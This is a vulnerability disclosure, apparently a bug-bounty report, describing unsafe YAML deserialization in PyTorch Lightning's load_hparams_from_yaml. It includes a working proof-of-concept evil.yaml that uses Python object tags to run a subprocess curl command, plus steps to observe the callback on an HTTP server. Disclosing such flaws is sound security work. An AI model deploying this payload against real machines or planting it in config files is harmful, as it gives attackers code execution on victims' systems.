Description

There is untrusted YAML Deserialization vulnerability on PyTorchLightning Github repository. PyTorchLightning’s saving.py (core.saving.load_hparams_from_yaml) functionality is calling “yaml.UnsafeLoader” from pyyaml Python library which is not secure method. Because of that, maliciously crafted yaml config file can cause code execution on the victim’s machine.

Proof of Concept

• Here is the poc.py file:

from pytorch_lightning import core
core.saving.load_hparams_from_yaml("evil.yaml")

• Here is the evil.yaml file:

- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1:8080/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load

• After that, you need to start HTTP server on your attacker machine’s port 8080. When you run the below command, you will see the HTTP request from the victim host because of the malicious yaml file.

python3 -m http.server 8080

• Run the poc.py file after that you will see HTTP request from coming the victim host,

python3 poc.py

Impact

Maliciously crafted yaml config file can cause code execution on the victim’s machine.